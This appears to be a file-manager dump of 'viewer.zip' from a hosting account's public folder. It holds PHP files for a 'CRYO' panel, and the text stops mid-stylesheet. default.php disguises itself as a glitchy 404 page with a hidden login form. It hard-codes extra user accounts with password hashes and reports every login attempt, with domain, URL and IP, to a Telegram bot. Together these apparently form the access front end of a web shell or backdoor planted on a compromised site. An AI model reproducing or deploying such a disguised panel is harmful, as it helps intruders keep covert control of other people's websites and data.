File manager

File manager - Edit - /home/buyherba/public_html/video/viewer.zip

Back
PK��ݤ�\P$+��add.phpnu��[��<?php function read_env($path) { if (!file_exists($path)) return array(); $lines = file($path, FILE_IGNORE_NEW_LINES \| FILE_SKIP_EMPTY_LINES); $env = array(); foreach ($lines as $line) { $line = trim($line); // Skip komentar dan baris kosong if ($line === '' \|\| $line[0] === '#') continue; // Pecah berdasarkan pertama kali tanda '=' muncul $equalPos = strpos($line, '='); if ($equalPos === false) continue; $key = trim(substr($line, 0, $equalPos)); $value = trim(substr($line, $equalPos + 1)); // Hilangkan quote jika ada if ((substr($value, 0, 1) === '"' && substr($value, -1) === '"') \|\| (substr($value, 0, 1) === "'" && substr($value, -1) === "'")) { $value = substr($value, 1, -1); } $env[$key] = $value; } return $env; } ?>PK��ݤ�\��vf1��f1��Core/Components/Verify.phpnu��[��<?php /** * A Compatibility library with PHP 5.5's simplified password hashing API. * * @author Anthony Ferrara <ircmaxell@php.net> * @license http://www.opensource.org/licenses/mit-license.html MIT License * @copyright 2012 The Authors / namespace { if (!defined('PASSWORD_BCRYPT')) { /* * PHPUnit Process isolation caches constants, but not function declarations. * So we need to check if the constants are defined separately from * the functions to enable supporting process isolation in userland * code. / define('PASSWORD_BCRYPT', 1); define('PASSWORD_DEFAULT', PASSWORD_BCRYPT); define('PASSWORD_BCRYPT_DEFAULT_COST', 10); } if (!function_exists('password_hash')) { /* * Hash the password using the specified algorithm * * @param string $password The password to hash * @param int $algo The algorithm to use (Defined by PASSWORD_* constants) * @param array $options The options for the algorithm to use * * @return string\|false The hashed password, or false on error. / function password_hash($password, $algo, array $options = array()) { if (!function_exists('crypt')) { trigger_error("Crypt must be loaded for password_hash to function", E_USER_WARNING); return null; } if (is_null($password) \|\| is_int($password)) { $password = (string) $password; } if (!is_string($password)) { trigger_error("password_hash(): Password must be a string", E_USER_WARNING); return null; } if (!is_int($algo)) { trigger_error("password_hash() expects parameter 2 to be long, " . gettype($algo) . " given", E_USER_WARNING); return null; } $resultLength = 0; switch ($algo) { case PASSWORD_BCRYPT: $cost = PASSWORD_BCRYPT_DEFAULT_COST; if (isset($options['cost'])) { $cost = (int) $options['cost']; if ($cost < 4 \|\| $cost > 31) { trigger_error(sprintf("password_hash(): Invalid bcrypt cost parameter specified: %d", $cost), E_USER_WARNING); return null; } } // The length of salt to generate $raw_salt_len = 16; // The length required in the final serialization $required_salt_len = 22; $hash_format = sprintf("$2y$%02d$", $cost); // The expected length of the final crypt() output $resultLength = 60; break; default: trigger_error(sprintf("password_hash(): Unknown password hashing algorithm: %s", $algo), E_USER_WARNING); return null; } $salt_req_encoding = false; if (isset($options['salt'])) { switch (gettype($options['salt'])) { case 'NULL': case 'boolean': case 'integer': case 'double': case 'string': $salt = (string) $options['salt']; break; case 'object': if (method_exists($options['salt'], '__tostring')) { $salt = (string) $options['salt']; break; } case 'array': case 'resource': default: trigger_error('password_hash(): Non-string salt parameter supplied', E_USER_WARNING); return null; } if (PasswordCompat\binary\_strlen($salt) < $required_salt_len) { trigger_error(sprintf("password_hash(): Provided salt is too short: %d expecting %d", PasswordCompat\binary\_strlen($salt), $required_salt_len), E_USER_WARNING); return null; } elseif (0 == preg_match('#^[a-zA-Z0-9./]+$#D', $salt)) { $salt_req_encoding = true; } } else { $buffer = ''; $buffer_valid = false; if (function_exists('mcrypt_create_iv') && !defined('PHALANGER')) { $buffer = mcrypt_create_iv($raw_salt_len, MCRYPT_DEV_URANDOM); if ($buffer) { $buffer_valid = true; } } if (!$buffer_valid && function_exists('openssl_random_pseudo_bytes')) { $strong = false; $buffer = openssl_random_pseudo_bytes($raw_salt_len, $strong); if ($buffer && $strong) { $buffer_valid = true; } } if (!$buffer_valid && @is_readable('/dev/urandom')) { $file = fopen('/dev/urandom', 'r'); $read = 0; $local_buffer = ''; while ($read < $raw_salt_len) { $local_buffer .= fread($file, $raw_salt_len - $read); $read = PasswordCompat\binary\_strlen($local_buffer); } fclose($file); if ($read >= $raw_salt_len) { $buffer_valid = true; } $buffer = str_pad($buffer, $raw_salt_len, "\0") ^ str_pad($local_buffer, $raw_salt_len, "\0"); } if (!$buffer_valid \|\| PasswordCompat\binary\_strlen($buffer) < $raw_salt_len) { $buffer_length = PasswordCompat\binary\_strlen($buffer); for ($i = 0; $i < $raw_salt_len; $i++) { if ($i < $buffer_length) { $buffer[$i] = $buffer[$i] ^ chr(mt_rand(0, 255)); } else { $buffer .= chr(mt_rand(0, 255)); } } } $salt = $buffer; $salt_req_encoding = true; } if ($salt_req_encoding) { // encode string with the Base64 variant used by crypt $base64_digits = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'; $bcrypt64_digits = './ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'; $base64_string = base64_encode($salt); $salt = strtr(rtrim($base64_string, '='), $base64_digits, $bcrypt64_digits); } $salt = PasswordCompat\binary\_substr($salt, 0, $required_salt_len); $hash = $hash_format . $salt; $ret = crypt($password, $hash); if (!is_string($ret) \|\| PasswordCompat\binary\_strlen($ret) != $resultLength) { return false; } return $ret; } /* * Get information about the password hash. Returns an array of the information * that was used to generate the password hash. * * array( * 'algo' => 1, * 'algoName' => 'bcrypt', * 'options' => array( * 'cost' => PASSWORD_BCRYPT_DEFAULT_COST, * ), * ) * * @param string $hash The password hash to extract info from * * @return array The array of information about the hash. / function password_get_info($hash) { $return = array( 'algo' => 0, 'algoName' => 'unknown', 'options' => array(), ); if (PasswordCompat\binary\_substr($hash, 0, 4) == '$2y$' && PasswordCompat\binary\_strlen($hash) == 60) { $return['algo'] = PASSWORD_BCRYPT; $return['algoName'] = 'bcrypt'; list($cost) = sscanf($hash, "$2y$%d$"); $return['options']['cost'] = $cost; } return $return; } /* * Determine if the password hash needs to be rehashed according to the options provided * * If the answer is true, after validating the password using password_verify, rehash it. * * @param string $hash The hash to test * @param int $algo The algorithm used for new password hashes * @param array $options The options array passed to password_hash * * @return boolean True if the password needs to be rehashed. / function password_needs_rehash($hash, $algo, array $options = array()) { $info = password_get_info($hash); if ($info['algo'] !== (int) $algo) { return true; } switch ($algo) { case PASSWORD_BCRYPT: $cost = isset($options['cost']) ? (int) $options['cost'] : PASSWORD_BCRYPT_DEFAULT_COST; if ($cost !== $info['options']['cost']) { return true; } break; } return false; } /* * Verify a password against a hash using a timing attack resistant approach * * @param string $password The password to verify * @param string $hash The hash to verify against * * @return boolean If the password matches the hash / function password_verify($password, $hash) { if (!function_exists('crypt')) { trigger_error("Crypt must be loaded for password_verify to function", E_USER_WARNING); return false; } $ret = crypt($password, $hash); if (!is_string($ret) \|\| PasswordCompat\binary\_strlen($ret) != PasswordCompat\binary\_strlen($hash) \|\| PasswordCompat\binary\_strlen($ret) <= 13) { return false; } $status = 0; for ($i = 0; $i < PasswordCompat\binary\_strlen($ret); $i++) { $status \|= (ord($ret[$i]) ^ ord($hash[$i])); } return $status === 0; } } } namespace PasswordCompat\binary { if (!function_exists('PasswordCompat\\binary\\_strlen')) { /* * Count the number of bytes in a string * * We cannot simply use strlen() for this, because it might be overwritten by the mbstring extension. * In this case, strlen() will count the number of characters based on the internal encoding. A * sequence of bytes might be regarded as a single multibyte character. * * @param string $binary_string The input string * * @internal * @return int The number of bytes / function _strlen($binary_string) { if (function_exists('mb_strlen')) { return mb_strlen($binary_string, '8bit'); } return strlen($binary_string); } /* * Get a substring based on byte limits * * @see _strlen() * * @param string $binary_string The input string * @param int $start * @param int $length * * @internal * @return string The substring / function _substr($binary_string, $start, $length) { if (function_exists('mb_substr')) { return mb_substr($binary_string, $start, $length, '8bit'); } return substr($binary_string, $start, $length); } /* * Check if current PHP version is compatible with the library * * @return boolean the check result / function check() { static $pass = NULL; if (is_null($pass)) { if (function_exists('crypt')) { $hash = '$2y$04$usesomesillystringfore7hnbRJHxXVLeakoG8K30oukPsA.ztMG'; $test = crypt("password", $hash); $pass = $test == $hash; } else { $pass = false; } } return $pass; } } } PK��ݤ�\��Core/Components/Dashboard.phpnu��[��PK��ݤ�\7��Core/Components/Log.phpnu��[��<?php // CRYO Logout Handler - sinkron dengan session save_path Dashboard.php $cryoPluginRoot = realpath(__DIR__ . '/../../'); if ($cryoPluginRoot) { $cryoSessDir = $cryoPluginRoot . '/.cryo_sessions'; if (is_dir($cryoSessDir) && is_writable($cryoSessDir)) { @ini_set('session.save_path', $cryoSessDir); @session_save_path($cryoSessDir); } } if (session_status() !== PHP_SESSION_ACTIVE) { @session_start(); } $_SESSION = []; if (ini_get("session.use_cookies")) { $params = session_get_cookie_params(); @setcookie(session_name(), '', time() - 42000, $params["path"], $params["domain"], $params["secure"], $params["httponly"] ); } @session_unset(); @session_destroy(); // Bangun URL absolut ke default.php (sama logikanya dengan cryo_default_url di Dashboard) $uri = ''; if (!empty($_SERVER['REQUEST_URI'])) $uri = $_SERVER['REQUEST_URI']; elseif (!empty($_SERVER['SCRIPT_NAME'])) $uri = $_SERVER['SCRIPT_NAME']; elseif (!empty($_SERVER['PHP_SELF'])) $uri = $_SERVER['PHP_SELF']; $qpos = strpos($uri, '?'); if ($qpos !== false) $uri = substr($uri, 0, $qpos); $dir = preg_replace('#/Core/Components/[^/]$#', '', $uri); if ($dir === null \|\| $dir === $uri) { $dir = preg_replace('#/[^/]$#', '', $uri); } if ($dir === null) $dir = ''; if ($dir === '' \|\| $dir[0] !== '/') $dir = '/' . ltrim((string)$dir, '/'); $dir = rtrim($dir, '/'); header("Location: " . $dir . '/default.php?logout=1'); exit; PK��ݤ�\�jί��nginx.conf.examplenu��[�� location ~ /\. { deny all; } location ^~ /config/ { deny all; } location ~ \.(env\|ini\|log\|sql\|bak\|sh)$ { deny all; } autoindex off; PK��ݤ�\NFaz��z��default.phpnu��[��<?php if (!function_exists('ws_random_bytes')) { function ws_random_bytes($length) { $length = (int)$length; if ($length <= 0) return ''; if (function_exists('random_bytes')) { return random_bytes($length); } if (function_exists('openssl_random_pseudo_bytes')) { $strong = false; $bytes = openssl_random_pseudo_bytes($length, $strong); if ($bytes !== false && strlen($bytes) === $length) { return $bytes; } } $urandom = '/dev/urandom'; if (is_readable($urandom)) { $h = @fopen($urandom, 'rb'); if ($h) { $bytes = @fread($h, $length); @fclose($h); if ($bytes !== false && strlen($bytes) === $length) { return $bytes; } } } $bytes = ''; for ($i = 0; $i < $length; $i++) { $bytes .= chr(mt_rand(0, 255)); } return $bytes; } } if (!function_exists('hash_equals')) { function hash_equals($known_string, $user_string) { $known_string = (string)$known_string; $user_string = (string)$user_string; if (strlen($known_string) !== strlen($user_string)) { return false; } $res = 0; $len = strlen($known_string); for ($i = 0; $i < $len; $i++) { $res \|= ord($known_string[$i]) ^ ord($user_string[$i]); } return $res === 0; } } /** * ===== Session bootstrap (AMAN di lingkungan WordPress) ===== * Hanya set session ini & cookie params kalau sesi BELUM aktif. / $httpsOn = ( (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') \|\| (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] === 'https') \|\| (isset($_SERVER['REQUEST_SCHEME']) && $_SERVER['REQUEST_SCHEME'] === 'https') \|\| (isset($_SERVER['SERVER_PORT']) && (int)$_SERVER['SERVER_PORT'] === 443) ); $secure = $httpsOn ? true : false; if (session_status() !== PHP_SESSION_ACTIVE) { // ==== Session hardening ==== ini_set('session.use_strict_mode', '1'); ini_set('session.cookie_httponly', '1'); if ($secure) { ini_set('session.cookie_secure', '1'); } // ===== FIX: gunakan folder lokal untuk session bila path default cPanel bermasalah ===== $localSessDir = __DIR__ . '/.cryo_sessions'; if (!is_dir($localSessDir)) { @mkdir($localSessDir, 0700, true); @file_put_contents($localSessDir . '/.htaccess', "Order allow,deny\nDeny from all\n<IfModule mod_authz_core.c>\nRequire all denied\n</IfModule>\n"); @file_put_contents($localSessDir . '/index.html', ''); } if (is_dir($localSessDir) && is_writable($localSessDir)) { @ini_set('session.save_path', $localSessDir); @session_save_path($localSessDir); } @ini_set('session.gc_maxlifetime', '7200'); // Set cookie params modern (PHP >= 7.3) if (PHP_VERSION_ID >= 70300) { session_set_cookie_params([ 'lifetime' => 0, 'path' => '/', 'domain' => '', 'secure' => $secure, 'httponly' => true, 'samesite' => 'Lax', ]); } else { // PHP < 7.3: belum ada dukungan SameSite native di session cookie session_set_cookie_params(0, '/', '', $secure, true); } // Suppress warning if a previous session file is corrupt; regenerate fresh on failure if (!@session_start()) { // Hapus cookie session lama lalu coba lagi if (ini_get('session.use_cookies')) { $params = session_get_cookie_params(); @setcookie(session_name(), '', time() - 42000, $params['path'], $params['domain'], $params['secure'], $params['httponly']); } @session_id(bin2hex(random_bytes(16))); @session_start(); } } // ==== Helper: hitung URL absolut ke Dashboard.php (selalu turunkan dari URL request) ==== if (!function_exists('cryo_dashboard_url')) { function cryo_dashboard_url() { // Sumber paling andal: REQUEST_URI (apa yang diminta browser), fallback ke SCRIPT_NAME / PHP_SELF $uri = ''; if (!empty($_SERVER['REQUEST_URI'])) $uri = $_SERVER['REQUEST_URI']; elseif (!empty($_SERVER['SCRIPT_NAME'])) $uri = $_SERVER['SCRIPT_NAME']; elseif (!empty($_SERVER['PHP_SELF'])) $uri = $_SERVER['PHP_SELF']; // Buang query string $qpos = strpos($uri, '?'); if ($qpos !== false) $uri = substr($uri, 0, $qpos); // Buang nama file (mis. /default.php) -> dapatkan direktori plugin $dir = preg_replace('#/[^/]$#', '', $uri); if ($dir === null) $dir = ''; if ($dir === '' \|\| $dir[0] !== '/') $dir = '/' . ltrim((string)$dir, '/'); $dir = rtrim($dir, '/'); return $dir . '/Core/Components/Dashboard.php'; } } // ==== Helper & ENV ==== require_once __DIR__ . '/add.php'; // berisi read_env() if (!function_exists('password_verify')) { require_once __DIR__ . '/Core/Components/Verify.php'; // polyfill jika PHP lama } $env = read_env(__DIR__ . '/Config/.env'); $NAME = isset($env['META_NAME']) ? $env['META_NAME'] : ''; $VALUE = isset($env['META_DB']) ? $env['META_DB'] : ''; // password hash (password_hash) // [TELEGRAM] Tambahan: baca token bot dan chat id dari .env $TELEGRAM_BOT_TOKEN = isset($env['TELEGRAM_BOT_TOKEN']) ? $env['TELEGRAM_BOT_TOKEN'] : ''; $TELEGRAM_CHAT_ID = isset($env['TELEGRAM_CHAT_ID']) ? $env['TELEGRAM_CHAT_ID'] : ''; // [TELEGRAM] Fungsi kirim notifikasi ke Telegram function sendTelegram($message) { global $TELEGRAM_BOT_TOKEN, $TELEGRAM_CHAT_ID; if (empty($TELEGRAM_BOT_TOKEN) \|\| empty($TELEGRAM_CHAT_ID)) return false; $url = "https://api.telegram.org/bot{$TELEGRAM_BOT_TOKEN}/sendMessage"; $data = [ 'chat_id' => $TELEGRAM_CHAT_ID, 'text' => $message, 'parse_mode' => 'HTML' ]; $options = [ 'http' => [ 'header' => "Content-type: application/x-www-form-urlencoded\r\n", 'method' => 'POST', 'content' => http_build_query($data), 'timeout' => 5, // timeout 5 detik, jangan sampai delay login ], ]; $context = stream_context_create($options); @file_get_contents($url, false, $context); return true; } // [TELEGRAM] Fungsi mendapatkan IP klien dengan aman (mendukung proxy) function getClientIP() { $ip = 'unknown'; if (isset($_SERVER['HTTP_CLIENT_IP']) && filter_var($_SERVER['HTTP_CLIENT_IP'], FILTER_VALIDATE_IP)) { $ip = $_SERVER['HTTP_CLIENT_IP']; } elseif (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { // Ambil IP pertama dari daftar (yang asli) $forwarded = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']); $first = trim($forwarded[0]); if (filter_var($first, FILTER_VALIDATE_IP)) { $ip = $first; } } elseif (isset($_SERVER['REMOTE_ADDR']) && filter_var($_SERVER['REMOTE_ADDR'], FILTER_VALIDATE_IP)) { $ip = $_SERVER['REMOTE_ADDR']; } return $ip; } // ==== Daftar pengguna multi-role ===== $users = []; // Admin dari file .env if (!empty($NAME) && !empty($VALUE)) { $users[$NAME] = [ 'password' => $VALUE, // sudah hash 'role' => 'admin' ]; } // Tambahkan user non-admin: ragil, edi, engkit (ganti password_hash sesuai keinginan) // Contoh: password 'rahasia123' -> hash dihasilkan dari password_hash('rahasia123', PASSWORD_DEFAULT) $users['semar'] = [ 'password' => '$2y$10$ogXeLz8GzTnyUR8xDR4w9.KfGr9qCDZbtdnO0lvLjkBjyxzIzvDhC', 'role' => 'semar' ]; $users['edi'] = [ 'password' => '$2y$10$Lxd0MI2GdbffJaZW3MTs3uyr6Dwhg8rHkP8NFHdjPIy4L6YOaYDuy', 'role' => 'edi' ]; $users['engkit'] = [ 'password' => '$2y$10$8tfXdo58AKTyFpLirtaTCulJ5qOyW9sRJRKoI0CKe/a5YGfLbnpsW', 'role' => 'engkit' ]; // ==== Helper URL (scheme/host/dir/home) ==== $httpsOnPg = ( (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') \|\| (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] === 'https') \|\| (isset($_SERVER['REQUEST_SCHEME']) && $_SERVER['REQUEST_SCHEME'] === 'https') \|\| (isset($_SERVER['SERVER_PORT']) && (int)$_SERVER['SERVER_PORT'] === 443) ); $scheme = $httpsOnPg ? 'https' : 'http'; $host = isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : 'localhost'; $host = preg_replace('/[^A-Za-z0-9\.\-:\[\]]/', '', $host); $dir = dirname(isset($_SERVER['SCRIPT_NAME']) ? $_SERVER['SCRIPT_NAME'] : '/'); $dir = rtrim(str_replace('\\', '/', $dir), '/'); $homeUrl = "{$scheme}://{$host}/"; // ==== CSRF minimal ==== if (empty($_SESSION['csrf'])) { $_SESSION['csrf'] = bin2hex(ws_random_bytes(16)); } function csrf_ok($token) { return is_string($token) && isset($_SESSION['csrf']) && hash_equals($_SESSION['csrf'], (string)$token); } // ==== Rate limit sangat sederhana (per session) ==== $RATE_MAX_ATTEMPTS = 5; $RATE_WINDOW_SEC = 300; $LOCK_SECONDS = 120; $cooldown_msg = null; if (!isset($_SESSION['rl'])) { $_SESSION['rl'] = ['start' => time(), 'count' => 0, 'lock' => 0]; } else { if (time() - $_SESSION['rl']['start'] > $RATE_WINDOW_SEC) { $_SESSION['rl'] = ['start' => time(), 'count' => 0, 'lock' => 0]; } } function rl_hit() { $max = isset($GLOBALS['RATE_MAX_ATTEMPTS']) ? (int)$GLOBALS['RATE_MAX_ATTEMPTS'] : 5; $lockSec = isset($GLOBALS['LOCK_SECONDS']) ? (int)$GLOBALS['LOCK_SECONDS'] : 120; $_SESSION['rl']['count'] = (int)(isset($_SESSION['rl']['count']) ? $_SESSION['rl']['count'] : 0) + 1; if ((int)(isset($_SESSION['rl']['count']) ? $_SESSION['rl']['count'] : 0) > $max) { $_SESSION['rl']['lock'] = time() + $lockSec; } } function rl_locked() { return (int)(isset($_SESSION['rl']['lock']) ? $_SESSION['rl']['lock'] : 0) > time(); } if (rl_locked()) { $remain = $_SESSION['rl']['lock'] - time(); $cooldown_msg = "Terlalu banyak percobaan. Coba lagi dalam ~{$remain}s."; } // ==== State login ==== $loginError = ""; // ==== Handler login: password (multi-user) ==== if (isset($_POST['login_pw']) && !$cooldown_msg) { if (!csrf_ok(isset($_POST['csrf']) ? $_POST['csrf'] : null)) { $loginError = "Sesi tidak valid. Muat ulang halaman."; } else { $username = isset($_POST['username']) ? (string)$_POST['username'] : ''; $password = isset($_POST['password']) ? (string)$_POST['password'] : ''; $userFound = null; // Cari di array users foreach ($users as $uname => $data) { if (hash_equals($uname, $username) && password_verify($password, $data['password'])) { $userFound = $data; $userFound['username'] = $uname; // simpan username break; } } if ($userFound) { $_SESSION['logged_in'] = true; $_SESSION['role'] = $userFound['role']; $_SESSION['user'] = $userFound['username']; $_SESSION['rl'] = ['start' => time(), 'count' => 0, 'lock' => 0]; session_regenerate_id(true); // [TELEGRAM] Notifikasi login berhasil $domain = isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : 'unknown'; $ip = getClientIP(); $dt = new DateTime('now', new DateTimeZone('Asia/Jakarta')); $time = $dt->format('Y-m-d H:i:s'); $message = "<b> Login Berhasil</b>\n" . "Domain: {$domain}\n" . "URL: {$scheme}://{$host}{$dir}/default.php\n" . "Role: {$userFound['role']}\n" . "User: {$userFound['username']}\n" . "IP: {$ip}\n" . "Waktu: {$time}"; sendTelegram($message); header("Location: " . cryo_dashboard_url()); exit; } else { rl_hit(); $loginError = "Iya Dikit Lagi Benar! Coba Lagi!!!"; // [TELEGRAM] Kirim notifikasi gagal login (password) $domain = isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : 'unknown'; $ip = getClientIP(); $dt = new DateTime('now', new DateTimeZone('Asia/Jakarta')); $time = $dt->format('Y-m-d H:i:s'); $message = "<b>❌ Login Gagal (Password)</b>\n" . "Domain: {$domain}\n" . "URL: {$scheme}://{$host}{$dir}/default.php\n" . "IP: {$ip}\n" . "Waktu: {$time}"; sendTelegram($message); } } } // ==== Jika sudah login, langsung masuk ==== if (!empty($_SESSION['logged_in'])) { header("Location: " . cryo_dashboard_url()); exit; } ?> <!DOCTYPE html> <html lang="id"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>CRYO</title> <style> /* ... (semua CSS asli tetap sama, tidak perlu diubah) ... / @import url('https://fonts.googleapis.com/css2?family=Roboto:wght@300;400;500;700&display=swap'); { box-sizing: border-box; } html, body { margin: 0; padding: 0; height: 100%; } body { font-family: 'Roboto', system-ui, -apple-system, BlinkMacSystemFont, 'Segoe UI', sans-serif; background: #1a1e23; color: #f5f5f5; overflow: hidden; } /* ==== BACKGROUND BUBBLE ala Alphardex (dimodif) ==== / .bubbles { position: fixed; inset: 0; width: 100%; height: 100vh; overflow: hidden; z-index: 0; background: radial-gradient(circle at top, #262b33 0, #14171c 55%, #050609 100%); pointer-events: none; } .bubble { position: absolute; bottom: -10vh; display: block; border-radius: 50%; opacity: 0.9; animation-name: float-up; animation-timing-function: ease-in; animation-iteration-count: infinite; background: radial-gradient(circle at 30% 30%, rgba(255,255,255,0.9), rgba(158,242,255,0.15) 45%, transparent 60%); box-shadow: 0 0 24px rgba(158, 242, 255, 0.45); } .bubble:nth-child(1) { left: 5vw; width: 3vw; height: 3vw; animation-duration: 18s; animation-delay: 0s; } .bubble:nth-child(2) { left: 15vw; width: 6vw; height: 6vw; animation-duration: 22s; animation-delay: 2s; } .bubble:nth-child(3) { left: 25vw; width: 4vw; height: 4vw; animation-duration: 16s; animation-delay: 4s; } .bubble:nth-child(4) { left: 35vw; width: 7vw; height: 7vw; animation-duration: 26s; animation-delay: 1s; } .bubble:nth-child(5) { left: 45vw; width: 5vw; height: 5vw; animation-duration: 20s; animation-delay: 3s; } .bubble:nth-child(6) { left: 55vw; width: 3.5vw; height: 3.5vw; animation-duration: 17s; animation-delay: 0.5s; } .bubble:nth-child(7) { left: 65vw; width: 6.5vw; height: 6.5vw; animation-duration: 24s; animation-delay: 1.5s; } .bubble:nth-child(8) { left: 75vw; width: 4.5vw; height: 4.5vw; animation-duration: 19s; animation-delay: 2.5s; } .bubble:nth-child(9) { left: 85vw; width: 3vw; height: 3vw; animation-duration: 21s; animation-delay: 4.5s; } .bubble:nth-child(10) { left: 10vw; width: 5.5vw; height: 5.5vw; animation-duration: 23s; animation-delay: 1.2s; } .bubble:nth-child(11) { left: 20vw; width: 3.8vw; height: 3.8vw; animation-duration: 18s; animation-delay: 3.1s; } .bubble:nth-child(12) { left: 30vw; width: 6.8vw; height: 6.8vw; animation-duration: 27s; animation-delay: 0.7s; } .bubble:nth-child(13) { left: 40vw; width: 4.2vw; height: 4.2vw; animation-duration: 17s; animation-delay: 2.7s; } .bubble:nth-child(14) { left: 50vw; width: 6.2vw; height: 6.2vw; animation-duration: 25s; animation-delay: 3.3s; } .bubble:nth-child(15) { left: 60vw; width: 4.8vw; height: 4.8vw; animation-duration: 19s; animation-delay: 1.8s; } .bubble:nth-child(16) { left: 70vw; width: 3.2vw; height: 3.2vw; animation-duration: 18s; animation-delay: 0.9s; } .bubble:nth-child(17) { left: 80vw; width: 5.8vw; height: 5.8vw; animation-duration: 24s; animation-delay: 2.2s; } .bubble:nth-child(18) { left: 12vw; width: 4.6vw; height: 4.6vw; animation-duration: 22s; animation-delay: 4.1s; } .bubble:nth-child(19) { left: 28vw; width: 3.4vw; height: 3.4vw; animation-duration: 17s; animation-delay: 1.6s; } .bubble:nth-child(20) { left: 38vw; width: 5.2vw; height: 5.2vw; animation-duration: 21s; animation-delay: 2.9s; } .bubble:nth-child(21) { left: 52vw; width: 4.1vw; height: 4.1vw; animation-duration: 19s; animation-delay: 0.3s; } .bubble:nth-child(22) { left: 68vw; width: 6.1vw; height: 6.1vw; animation-duration: 26s; animation-delay: 3.9s; } .bubble:nth-child(23) { left: 82vw; width: 4.3vw; height: 4.3vw; animation-duration: 20s; animation-delay: 1.1s; } .bubble:nth-child(24) { left: 90vw; width: 3.7vw; height: 3.7vw; animation-duration: 18s; animation-delay: 2.4s; } .bubble:nth-child(25) { left: 5vw; width: 7.1vw; height: 7.1vw; animation-duration: 28s; animation-delay: 4.4s; } @keyframes float-up { to { transform: translateY(-175vh); } } / ==== LAYER KONTEN ==== / #blackhole { position: relative; z-index: 10; height: 100vh; width: 100vw; display: flex; align-items: center; justify-content: center; } / ==== 404 BOX GLITCHY ==== / .error-box { position: relative; padding: 26px 30px 22px; border-radius: 18px; background: rgba(10, 12, 18, 0.92); box-shadow: 0 0 0 1px rgba(158, 242, 255, 0.08), 0 22px 40px rgba(0,0,0,0.9); text-align: center; max-width: 320px; width: 90vw; backdrop-filter: blur(10px); animation: errorPop 0.8s ease-out, errorFloat 4.5s ease-in-out infinite; overflow: hidden; } @keyframes errorPop { from { opacity: 0; transform: translateY(12px) scale(0.95); } to { opacity: 1; transform: translateY(0) scale(1); } } @keyframes errorFloat { 0%,100% { transform: translateY(0); } 50% { transform: translateY(-6px); } } .glitch { position: relative; display: inline-block; font-size: 64px; letter-spacing: .18em; text-transform: uppercase; color: #f0fbff; text-shadow: 0 0 8px rgba(158, 242, 255, 0.7), 0 0 22px rgba(0,0,0,1); margin-bottom: 6px; animation: glitch-skew 3s infinite linear alternate-reverse; } .glitch::before, .glitch::after { content: attr(data-text); position: absolute; top: 0; left: 0; width: 100%; overflow: hidden; } .glitch::before { left: 2px; text-shadow: -2px 0 #ff005c; clip: rect(0, 900px, 0, 0); animation: glitch-before 2.3s infinite linear alternate-reverse; } .glitch::after { left: -2px; text-shadow: -2px 0 #00f7ff; clip: rect(0, 900px, 0, 0); animation: glitch-after 2.8s infinite linear alternate-reverse; } @keyframes glitch-before { 0% { clip: rect(5px, 999px, 25px, 0); } 20% { clip: rect(20px, 999px, 60px, 0); } 40% { clip: rect(45px, 999px, 80px, 0); } 60% { clip: rect(10px, 999px, 40px, 0); } 80% { clip: rect(30px, 999px, 70px, 0); } 100% { clip: rect(0px, 999px, 90px, 0); } } @keyframes glitch-after { 0% { clip: rect(55px, 999px, 90px, 0); } 25% { clip: rect(10px, 999px, 35px, 0); } 50% { clip: rect(30px, 999px, 60px, 0); } 75% { clip: rect(0px, 999px, 25px, 0); } 100% { clip: rect(40px, 999px, 80px, 0); } } @keyframes glitch-skew { 0% { transform: skew(0deg); } 40% { transform: skew(1deg); } 60% { transform: skew(-1deg); } 100% { transform: skew(0deg); } } .error-subtitle { font-size: 13px; text-transform: uppercase; letter-spacing: .26em; color: #9bb6c7; margin-bottom: 10px; } .error-message { font-size: 13px; color: #b9c7d5; opacity: 0.82; word-break: break-word; } / === LOGIN MODAL NEON STYLE === / .login-form-box { position: absolute; left: 50%; top: 50%; z-index: 20; transform: translate(-50%, -50%); width: 320px; max-width: 92vw; padding: 28px 24px 22px; border-radius: 16px; background: radial-gradient(circle at top left, rgba(255, 77, 77, 0.7), transparent 60%), radial-gradient(circle at bottom right, rgba(0, 0, 0, 0.9), transparent 55%), rgba(8, 8, 16, 0.96); box-shadow: 0 0 0 1px rgba(255, 128, 128, 0.18), 0 24px 55px rgba(0, 0, 0, 0.95); display: none; animation: fadeIn 0.7s ease-out; overflow: hidden; } .login-form-box::before { content: ""; position: absolute; inset: -60%; background: conic-gradient( from 120deg, rgba(255, 0, 0, 0.2), rgba(255, 255, 255, 0.15), rgba(0, 0, 0, 0.5), rgba(255, 0, 0, 0.2) ); opacity: 0.4; filter: blur(32px); z-index: -1; animation: glowSweep 16s linear infinite; } @keyframes glowSweep { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } } @keyframes fadeIn { from { opacity: 0; transform: translate(-50%, -55%) scale(0.96); } to { opacity: 1; transform: translate(-50%, -50%) scale(1); } } .login-header { margin-bottom: 14px; text-align: left; } .login-header h2 { margin: 0 0 4px; font-size: 17px; letter-spacing: .16em; text-transform: uppercase; color: #ffe6e6; } .login-form-box form { display: flex; flex-direction: column; gap: 11px; } / TEKS BERGELOMBANG UNTUK TOMBOL / .wave-text { display: inline-flex; gap: 0.08em; font-size: 11px; color: inherit; text-shadow: 0 0 6px rgba(255, 80, 80, 0.7); text-transform: uppercase; letter-spacing: .18em; } .wave-text span { display: inline-block; animation: wave 1.6s ease-in-out infinite; transform-origin: center bottom; } .wave-text span:nth-child(1) { animation-delay: 0s; } .wave-text span:nth-child(2) { animation-delay: 0.04s; } .wave-text span:nth-child(3) { animation-delay: 0.08s; } .wave-text span:nth-child(4) { animation-delay: 0.12s; } .wave-text span:nth-child(5) { animation-delay: 0.16s; } .wave-text span:nth-child(6) { animation-delay: 0.20s; } .wave-text 